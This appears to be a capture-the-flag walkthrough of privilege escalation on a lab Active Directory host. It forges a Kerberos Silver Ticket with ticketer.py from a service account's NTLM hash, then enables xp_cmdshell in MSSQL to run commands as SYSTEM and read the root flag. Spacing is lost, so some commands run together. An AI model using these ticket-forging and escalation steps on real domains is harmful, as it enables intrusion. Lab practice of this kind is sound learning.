You have a SQL service account and password. You want to access to the SQL with Administrator Service Ticket, so that you can run xp_cmdshell command to escalate the privilege to SYSTEM.
Practices
# Service Account: svc_sql# Password: REGGIE1234ronnie # Create a NTLM hash from a passwordiptracej@kali~/h/Escape>python3>>> importhashlib>>> hashlib.new('md4','REGGIE1234ronnie '.encode('utf-16le')).digest().hex()'1443ec19da4dac4ffc953bca1b57b4cf'# Get Domain SIDgetPac.pysequel.htb/sql_svc:REGGIE1234ronnie-targetUserAdministratorsudontpdate-usequel.htb# Domain SID: S-1-5-21-4078382237-1492182817-2568127209# Create a Silver Ticket # We fake a SPN set to this ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn Hahahah/dc.sequel.htb Administrator
# Access to MSSQL KRB5CCNAME=Administrator.ccachemssqlclient.py-kadministrator@dc.sequel.htb# MSSQLSQL> enable_xp_cmdshellSQL> xp_cmdshellwhoamiSQL> selectxfromOpenRowset(BULK'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) R(x)